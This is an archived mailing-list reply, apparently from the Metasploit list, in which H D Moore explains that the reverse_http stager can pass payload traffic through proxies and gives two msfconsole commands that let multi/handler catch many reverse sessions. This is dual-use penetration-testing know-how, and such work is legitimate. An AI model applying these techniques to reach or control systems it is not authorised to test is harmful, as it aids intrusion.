Three questions: Proxies and the Wiki and multi/handler

[hdm at metasploit.com (H D Moore)]

On Thu, 07 May 2009 08:26:16 -0500, Matt Gardenghi <mtgarden at gmail.com>  
wrote:

> 1) Is there a technique for setting a payload to work over a proxy?  I  
> haven't noticed it yet, though that means little....
>
> Some locations (i.e. my own company) proxies *everything.*  My research  
> has indicated that not a whole lot of malware is proxy aware, but that  
> the foundation is being laid as companies are tightening up some of the  
> data exfiltration going on.  So, will we see a automatic proxy detection  
> in our payloads or the ability to manually configure a proxy?

Proxy support increases size which makes it harder to actually use  
proxy-aware payloads. The best option we have now is the reverse_http  
stager, recently rewritten by natron. This stager uses IE+HTTP (reading  
local proxy settings from the registry, if the payload is running as a  
configured user) and can be used to get a shell, vnc session, or  
meterpreter prompt.

> 2) I understand that there are several interesting articles under  
> trac.metasploit.com/wiki/ but I don't see a list for them anywhere.  So  
> this makes it challenging to dig around and find useful articles.

Valid, we need a documentation overhaul.

> 3) multi/handler; is it possible to get the multi/handler to grab lots  
> of incoming connections?  I seem to be missing this one as well.  I  
> would assume its possible, cause it seems impractical to continually  
> create new exploits with new port numbers/instances of multi/handler to  
> target multiple machines simultaneously.

Yup.

msf exploit (multi/handler) > set ExitOnSession false
msf exploit (multi/handler) > exploit -j

-HD